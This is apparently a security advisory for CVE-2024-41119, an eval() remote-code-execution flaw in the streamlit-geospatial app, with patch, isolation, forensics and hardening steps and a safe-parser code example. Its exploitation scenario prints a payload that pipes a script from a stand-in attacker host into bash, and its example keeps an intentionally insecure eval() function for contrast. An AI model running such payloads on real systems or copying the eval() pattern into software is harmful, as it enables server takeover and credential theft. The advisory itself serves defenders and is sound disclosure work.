CVE-2024-41119: streamlit-geospatial: RCE via eval() on vis_params input
CRITICAL | PoC available | CISA SSVC: Attend
This is a trivially exploitable remote code execution vulnerability requiring no authentication: any internet-exposed instance can be fully compromised. Patch immediately to commit c4f81d96 or take the application offline; assume breach if the service was publicly accessible. Audit all Streamlit-based ML dashboards in your environment for similar eval() patterns on user-controlled inputs.
Risk Assessment
Maximum risk for any internet-exposed deployment. CVSS 9.8 with AV:N/AC:L/PR:N/UI:N means no barriers to exploitation: one crafted value typed into the page's vis_params input and submitted through a normal browser session is sufficient. The eval() antipattern is well understood and exploits are trivial to craft, placing this within script-kiddie reach. AI/ML dashboards are frequently deployed on internal or cloud infrastructure with broad permissions (model access, cloud credentials, data pipelines), which amplifies the blast radius well beyond the application itself.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| streamlit-geospatial | pip | All checkouts prior to commit c4f81d9616d40c60584e36abb15300853a66e489 | Commit c4f81d9616d40c60584e36abb15300853a66e489 (no versioned release listed) |
Any deployment built from a checkout older than the fix commit is affected.
Recommended Action
1. PATCH: Update to commit c4f81d9616d40c60584e36abb15300853a66e489 immediately; verify that the eval() call on line 86 of pages/8_🏜️_Raster_Data_Visualization.py has been replaced with safe input handling.
2. ISOLATE: If patching is not immediately possible, take the application offline or restrict access to trusted IP ranges via network controls (VPN, firewall allowlist).
3. AUDIT: Review all other pages in the application and any other Streamlit apps in your environment for eval(), exec(), or subprocess calls on user-controlled inputs.
4. FORENSICS: If the application was internet-accessible, conduct incident response: check for new user accounts, cron jobs, unusual outbound connections, unauthorized file modifications on the host, and shell or curl child processes spawned by the Streamlit Python process; rotate any cloud credentials the host could reach.
5. HARDEN: Enforce a policy that Streamlit ML apps must never pass user input to eval/exec; add SAST rules to CI/CD pipelines (Bandit B307 for eval, B102 for exec; Semgrep's eval-detected rule) to catch the pattern in Python ML codebases.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-41119?
CVE-2024-41119 is an unauthenticated remote code execution vulnerability in streamlit-geospatial. On the Raster Data Visualization page, the `vis_params` value a user types is passed to Python's eval(), so any expression entered in that field runs on the server. The issue is fixed in commit c4f81d9616d40c60584e36abb15300853a66e489; patch or take the app offline, assume breach if it was publicly reachable, and audit other Streamlit dashboards for the same eval() pattern on user-controlled inputs.
Is CVE-2024-41119 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-41119 (see the GitHub Security Lab advisory in the references), which increases the likelihood of exploitation.
How to fix CVE-2024-41119?
1. PATCH: Update to commit c4f81d9616d40c60584e36abb15300853a66e489 immediately; verify that the eval() call on line 86 of pages/8_🏜️_Raster_Data_Visualization.py has been replaced with safe input handling. 2. ISOLATE: If patching is not immediately possible, take the application offline or restrict access to trusted IP ranges via network controls (VPN, firewall allowlist). 3. AUDIT: Review all other pages in the application and any other Streamlit apps in your environment for eval(), exec(), or subprocess calls on user-controlled inputs. 4. FORENSICS: If the application was internet-accessible, conduct incident response: check for new user accounts, cron jobs, unusual outbound connections, unauthorized file modifications on the host, and shell or curl child processes spawned by the Streamlit Python process; rotate any cloud credentials the host could reach. 5. HARDEN: Enforce a policy that Streamlit ML apps must never pass user input to eval/exec; add SAST rules to CI/CD pipelines (Bandit B307 for eval, B102 for exec; Semgrep's eval-detected rule) to catch the pattern in Python ML codebases.
What systems are affected by CVE-2024-41119?
This vulnerability affects the following AI/ML architecture patterns: ML data visualization dashboards, geospatial AI/ML platforms, research compute environments, model serving.
What is the CVSS score for CVE-2024-41119?
CVE-2024-41119 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.56%.
Technical Details
NVD Description
streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `vis_params` variable on line 80 in `8_🏜️_Raster_Data_Visualization.py` takes user input, which is later used in the `eval()` function on line 86, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.
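As an added example (not code from streamlit-geospatial or from the fix commit), the pattern the NVD text describes sits next to a hardened replacement. The function names, the ALLOWED_KEYS set, the length cap and the sample inputs are assumptions for illustration; the point is that ast.literal_eval accepts only Python literals (no names, calls or attribute access), and that a schema check after parsing is still needed because a literal is not automatically a valid visualisation-parameter dict.

```python
"""Added example: the eval() antipattern beside a literal-only, schema-checked parser."""
import ast
from typing import Any

# Keys a raster vis_params dict may carry (assumed for this example).
ALLOWED_KEYS = {"bands", "min", "max", "palette", "gamma", "opacity"}
NUMERIC_KEYS = ("min", "max", "gamma", "opacity")
MAX_INPUT_LEN = 2048  # literal_eval still has to parse the text; cap it to limit parser abuse


def parse_vis_params_unsafe(user_text: str) -> Any:
    """The vulnerable pattern: eval() over text typed into a Streamlit widget.
    Any Python expression runs server-side with the app's privileges."""
    return eval(user_text)  # intentionally insecure, shown for contrast only


def parse_vis_params_safe(user_text: str) -> dict:
    """Hardened replacement: parse as a Python literal only, then validate the shape."""
    if len(user_text) > MAX_INPUT_LEN:
        raise ValueError("vis_params too long")
    try:
        value = ast.literal_eval(user_text)  # rejects names, calls, attributes, subscripts
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError("vis_params must be a literal dict") from exc
    return _validate(value)


def _validate(value: Any) -> dict:
    """Schema check: a dict with known keys and plausibly typed values."""
    if not isinstance(value, dict):
        raise ValueError("vis_params must be a dict")
    unknown = {k for k in value if k not in ALLOWED_KEYS}
    if unknown:
        raise ValueError(f"unsupported vis_params keys: {sorted(map(repr, unknown))}")
    for key in NUMERIC_KEYS:
        if key in value:
            v = value[key]
            # bool is an int subclass; exclude it explicitly
            if isinstance(v, bool) or not isinstance(v, (int, float)):
                raise ValueError(f"{key} must be numeric")
    for key in ("bands", "palette"):
        if key in value:
            items = value[key]
            if not isinstance(items, list) or not all(isinstance(x, str) for x in items):
                raise ValueError(f"{key} must be a list of strings")
    return value


def rejects(user_text: str) -> bool:
    """True if the hardened parser refuses the input."""
    try:
        parse_vis_params_safe(user_text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a legitimate dict and an expression-style payload.
    good = "{'bands': ['B4', 'B3', 'B2'], 'min': 0, 'max': 3000}"
    payload = "__import__('os').getcwd()"  # harmless stand-in for a real RCE payload
    print("safe parser accepts :", parse_vis_params_safe(good))
    print("safe parser rejects :", rejects(payload))
    print("eval() executes it  :", parse_vis_params_unsafe(payload))
```

If the input format is yours to choose, json.loads with the same _validate step is stricter still, since JSON has no tuple, set or complex-number syntax for a parser to reason about.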
Exploitation Scenario
An attacker discovers an internet-exposed streamlit-geospatial instance via Shodan or Censys (Streamlit listens on port 8501 by default). They open the Raster Data Visualization page and submit a crafted vis_params value such as: `__import__('os').popen('curl https://attacker.com/implant.sh | bash').read()`. The application passes the string directly to eval() on line 86 with no sanitization, so the expression runs server-side with the privileges of the Streamlit process. Within seconds the attacker has a reverse shell on the ML host, from which they can exfiltrate model weights, cloud credentials (AWS IAM keys, GCP service accounts) and the contents of any connected databases or data pipelines, all without a username or password.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/8_%F0%9F%8F%9C%EF%B8%8F_Raster_Data_Visualization.py (Product)
- github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489 (Patch)
- securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/ (Exploit, Third Party)
- github.com/fkie-cad/nvd-json-data-feeds (Exploit)
Related Vulnerabilities
- CVE-2024-41115 (9.8) streamlit-geospatial: eval() injection enables RCE (same package)
- CVE-2024-41112 (9.8) streamlit-geospatial: RCE via eval() on palette input (same package)
- CVE-2024-41113 (9.8) streamlit-geospatial: RCE via eval() in Timelapse page (same package)
- CVE-2024-41114 (9.8) streamlit-geospatial: RCE via eval() on palette input (same package)
- CVE-2024-41116 (9.8) streamlit-geospatial: RCE via eval() injection (same package)